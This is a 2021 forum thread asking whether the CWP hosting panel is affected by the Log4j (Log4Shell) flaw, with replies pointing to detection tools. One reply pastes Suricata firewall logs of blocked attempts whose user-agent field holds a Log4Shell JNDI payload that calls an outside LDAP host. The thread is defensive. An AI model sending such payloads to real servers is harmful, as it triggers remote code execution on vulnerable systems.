Author Topic: log4j security issue  (Read 3002 times)

0 Members and 1 Guest are viewing this topic.

Offline
**
log4j security issue
« on: December 13, 2021, 09:58:54 AM »
Hi,

Are we affected by log4j volunerability and if yes, when does it get patched?

thanks

Offline
*
Re: log4j security issue
« Reply #1 on: December 13, 2021, 11:15:44 AM »
I attach to the question. I also do not know if cwp is susceptible. Attempts to exploit this vulnerability are already appearing on the firewall.
Code: [Select]
2021-12-12T00:57:22 suricata[78162] [Drop] [1:10006897:2] ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034647:1] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":10006897,"rev":2,"signature":"ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"created_at":["2021_12_10"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034649,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034647,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}

Offline
**
Re: log4j security issue
« Reply #2 on: December 13, 2021, 11:32:29 AM »
what log file has you checked for this?

Wanna check on mine also

thanks

Offline
*
Re: log4j security issue
« Reply #3 on: December 13, 2021, 11:40:31 AM »
External firewall

Offline
*
Re: log4j security issue
« Reply #4 on: December 13, 2021, 06:04:25 PM »
cwp is not using ldap or log4j or java.
VPS & Dedicated server provider with included FREE Managed support for CWP.
http://www.studio4host.com/

*** Don't allow that your server or website is down, choose hosting provider with included expert managed support for your CWP.

Offline
***
Re: log4j security issue
« Reply #5 on: December 15, 2021, 10:38:53 PM »
The best article I could find about it was this:
https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html

You can check your server with 'syft':
https://github.com/anchore/syft

If there is any java jar class on your server, it should be checked with 'grype':
https://github.com/anchore/grype

Regards,
Netino